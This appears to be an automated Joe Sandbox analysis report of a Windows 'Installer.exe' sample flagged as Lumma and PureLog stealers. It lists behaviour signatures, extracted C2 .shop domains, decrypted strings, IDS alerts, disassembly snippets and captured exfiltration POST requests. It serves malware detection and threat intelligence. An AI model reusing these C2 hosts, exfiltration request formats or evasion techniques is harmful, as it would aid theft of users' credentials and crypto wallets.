Edit tour

Windows Analysis Report
Installer.exe

Overview

General Information

Sample name:	Installer.exe
Analysis ID:	1584539
MD5:	d6c51af8146503eebc3a023123936d29
SHA1:	d5cf6cd9eae11dc0323d05604b265ce270746ae8
SHA256:	739cf0a20292e03993ee29ea156dbcc281e7316a319d5dbbf8a7b0895aed09bb
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Installer.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\Installer.exe" MD5: D6C51AF8146503EEBC3A023123936D29)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Installer.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\Installer.exe" MD5: D6C51AF8146503EEBC3A023123936D29)

WerFault.exe (PID: 7564 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 164 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["tirepublicerj.shop", "wholersorie.shop", "noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop", "rabidcowse.shop", "fancywaxxers.shop", "abruptyopsn.shop", "cloudewahsj.shop"], "Build id": "yau6Na--1666242818"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Installer.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1653958308.00000000007A2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2071607621.0000000003D69000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: Installer.exe PID: 7480	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.0.Installer.exe.7a0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Installer.exe.3d69550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Installer.exe.3d69550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:40:59.108516+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.32.1	443	TCP
2025-01-05T19:41:00.236523+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.32.1	443	TCP
2025-01-05T19:41:01.655742+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.32.1	443	TCP
2025-01-05T19:41:02.758603+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.32.1	443	TCP
2025-01-05T19:41:03.792134+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.32.1	443	TCP
2025-01-05T19:41:05.167559+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.32.1	443	TCP
2025-01-05T19:41:06.604372+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.32.1	443	TCP
2025-01-05T19:41:08.742208+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:40:59.744568+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.32.1	443	TCP
2025-01-05T19:41:00.750160+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.32.1	443	TCP
2025-01-05T19:41:09.245583+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49743	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:40:59.744568+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:41:00.750160+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49732	104.21.32.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:40:59.108516+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	104.21.32.1	443	TCP
2025-01-05T19:41:00.236523+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	104.21.32.1	443	TCP
2025-01-05T19:41:01.655742+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	104.21.32.1	443	TCP
2025-01-05T19:41:02.758603+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	104.21.32.1	443	TCP
2025-01-05T19:41:03.792134+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49739	104.21.32.1	443	TCP
2025-01-05T19:41:05.167559+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49741	104.21.32.1	443	TCP
2025-01-05T19:41:06.604372+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49742	104.21.32.1	443	TCP
2025-01-05T19:41:08.742208+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.4	49743	104.21.32.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:40:58.597126+0100	2058656	1	Domain Observed Used for C2 Detected	192.168.2.4	54217	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:41:05.671560+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.32.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fancywaxxers.shop/apih	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/e	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.Installer.exe.3d69550.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "wholersorie.shop", "noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop", "rabidcowse.shop", "fancywaxxers.shop", "abruptyopsn.shop", "cloudewahsj.shop"], "Build id": "yau6Na--1666242818"}

Multi AV Scanner detection for submitted file

Source: Installer.exe

ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.3% probability

Machine Learning detection for sample

Source: Installer.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fancywaxxers.shop
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: yau6Na--1666242818

Source: C:\Users\user\Desktop\Installer.exe

Code function: 2_2_0041616F CryptUnprotectData,

2_2_0041616F

Source: Installer.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49743 version: TLS 1.2

Source: Installer.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: System.pdb) source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: Handler.pdb source: Installer.exe, WERD47F.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERD47F.tmp.dmp.5.dr

Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+64h]	2_2_00426970
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	2_2_004453C0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then cmp byte ptr [eax+edi+09h], 00000000h	2_2_0043DCC0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov byte ptr [ecx], bl	2_2_0040D7E3
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov edx, eax	2_2_0041C079
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+6EE4CA62h]	2_2_0042C006
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_004150C0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_004150C0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+4B6F866Ah]	2_2_0041A8F0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-000000D8h]	2_2_0041A8F0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx esi, word ptr [eax]	2_2_00428898
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_004310BA
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_00431150
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0040F15C
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_00432966
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0043106C
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov edx, eax	2_2_0041E930
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_004311C0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-60DFD4D8h]	2_2_004429A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_004311B1
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	2_2_0042CA41
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_00409200
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_0041821B
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then push edi	2_2_0043EAD0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+05h]	2_2_0043F2A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov edx, ecx	2_2_0043F2A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx esi, word ptr [ebp+edx+02h]	2_2_0043F2A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	2_2_0042FB40
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov word ptr [edi], cx	2_2_0041A368
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov word ptr [ecx], si	2_2_004223E6
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then cmp word ptr [eax+edx+02h], 0000h	2_2_0040B3A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then push edi	2_2_00415BA0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-00000096h]	2_2_0042C44F
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov ecx, eax	2_2_0042A450
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov ecx, edx	2_2_00444C10
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov ecx, eax	2_2_0042A430
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0043AC30
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	2_2_0042CC9C
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx-4FD5DA21h]	2_2_004094A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_0042DCA0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov ecx, eax	2_2_0041BD50
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	2_2_0041FD70
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_0040E579
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_0040E579
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_0041D510
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C18AD805h	2_2_0040D520
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_00407640
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_00407640
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	2_2_00429670
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov eax, dword ptr [0044CCB8h]	2_2_00429670
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then test edi, edi	2_2_00408E10
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then cmp cl, 0000002Eh	2_2_0042A630
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov ecx, eax	2_2_0042A630
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then test esi, esi	2_2_0043EEC0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-00000096h]	2_2_0042C68E
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0043169D
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_0042F6A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]	2_2_004296AB
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	2_2_00441740
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then mov ecx, eax	2_2_0042AF1D
Source: C:\Users\user\Desktop\Installer.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	2_2_0041FFE0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49739 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49738 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49734 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49741 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49743 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49742 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49730 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.4:54217 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49732 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.32.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: fancywaxxers.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop

Source: global traffic

TCP traffic: 192.168.2.4:53944 -> 162.159.36.2:53

Source: Joe Sandbox View

IP Address: 104.21.32.1 104.21.32.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PUDNFQAYMVHRRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18138Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D3RME3DCUFW4AHM48User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8783Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IHGZGOG8TVYWXZ9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20424Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QVONRDKT5AL3UHL4IYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1005Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SH0IYEGY6APUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572005Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: fancywaxxers.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fancywaxxers.shop

Source: unknown

